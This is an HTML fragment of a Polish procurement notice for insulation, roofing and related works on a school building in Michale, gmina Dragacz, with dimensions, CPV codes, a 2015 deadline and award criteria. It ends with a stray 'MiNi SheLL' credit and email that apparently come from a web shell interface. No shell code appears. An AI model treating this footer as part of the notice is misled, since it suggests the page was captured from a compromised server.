<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 2: obejmująca wykonanie robót budowlanych związanych z zadaniem pn.: Docieplenie ściani stropów budynku Gimnazjum w Michalu, gm. Dragacz, łączna pow. ścian i stropów: 2.478,50 m2, wys. budynku (bud. szkoły: 8,40 m, łącznik: 4,20 m, sala gimnastyczna 9,50 m), kubatura: 9.223.20 m3. Zakres przedmiotu zamówienia dla  CZĘŚĆ 2: 
- demontaż i zmagazynowanie elementów zewnętrznych przeznaczonych do ponownego wykorzystania,
- demontaż elementów zewnętrznych nie nadających się do ponownego wykorzystania,
- wykonanie izolacji termicznej cokołu budynku za pomocą styropianu gr. 10cm  EPS 100 lamda max= 0,040 W na m  K,
- wykonanie izolacji termicznej ścian zewnętrznych budynku za pomocą styropianu gr. 15cm i 12cm EPS 70 lamda max= 0,040 W na m K wraz z wykonaniem faktury i powłok malarskich wg kolorystyki elewacji,
- wykonanie izolacji termicznej ościeży budynku za pomocą styropianu gr. 2cm  EPS 70 lamda max= 0,040 W na m K,
- wykonanie izolacji termicznej gzymsu  budynku za pomocą styropianu gr. 5cm  EPS 70 lamda max= 0,040 W na m K,
- wykonania docieplenia stropodachu niewentylowanego przy pomocy płyt styropapy EPS 100 gr. 18cm lamda max= 0,036 W na m K,
- wykonania docieplenia stropodachu wentylowanego przy pomocy granulatu celulozowego gr. 18cm lamda max= 0,039 W na m K,
- wykonanie nowego pokrycia dachowego dla stropodachu niewentylowanego,
- wykonanie nowych obróbek blacharskich oraz montaż obróbek nadających się do ponownego wykorzystania,
- wzmocnienie rys i pęknięć konstrukcyjnych,
- roboty malarskie wewnętrzne,
- wymianie luksferów nad wejściem głównym do budynku,
- roboty elektryczne instalacyjne, w tym wymiana instalacji odgromowej,
-  montaż i demontaż rusztowania,
- pozostałe roboty wymagane do prawidłowego zakończenia zamierzenia inwestycyjnego.
Podstawowe wymiary:  
Wysokość od poziomu terenu do wierzchu attyki: 
- główny gmach szkoły - 8,40m
- łącznik - 4,20m 
- sala gimnastyczna - 9,50m
Powierzchnia zabudowy: 1347,0m2
Kubatura budynku ca. 9223,2m3.
Uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz w zał. Nr 3.1 Dokumentacja projektowa (z przedmiarem robót załączonym pomocniczo, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz projektem budowlanym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.32.10.00-3, 45.44.21.00-8, 45.44.30.00-4, 45.31.00.00-3, 45.11.13.00-1, 45.26.21.00-2, 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwrancja jakości - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com